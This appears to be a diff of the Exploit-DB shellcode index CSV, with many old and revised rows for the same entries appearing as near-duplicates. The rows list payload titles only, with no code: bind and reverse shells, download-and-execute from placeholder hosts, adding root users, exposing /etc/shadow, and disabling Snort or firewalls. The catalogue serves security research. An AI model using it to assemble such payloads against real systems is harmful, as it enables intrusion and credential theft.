13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
@ -137,11 +137,11 @@ id,file,description,date,author,type,platform
13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
@ -153,8 +153,8 @@ id,file,description,date,author,type,platform
13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86
13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
13400,shellcodes/linux_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,linux_x86
13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator
13402,shellcodes/linux_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,linux_x86
@ -164,28 +164,28 @@ id,file,description,date,author,type,platform
13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86
13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86
13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86
13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86
13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86
13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86
13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86
13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86
13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86
13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/linux_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13430,shellcodes/linux_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86
13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86
13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
@ -198,66 +198,67 @@ id,file,description,date,author,type,platform
13440,shellcodes/linux_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13441,shellcodes/linux_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,linux_x86
13442,shellcodes/linux_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve(/bin/sh) Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve(/bin/sh) Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86
13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,linux_x86
13453,shellcodes/linux_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,linux_x86
13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86
13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2004-09-12,dev0id,shellcode,linux_x86
43633,shellcodes/openbsd_x86/43633.c,"OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86
13453,shellcodes/bsd_x86/13453.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,bsd_x86
13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86
13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple
13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple
13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple
13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple
13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc
13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc
13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc
13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
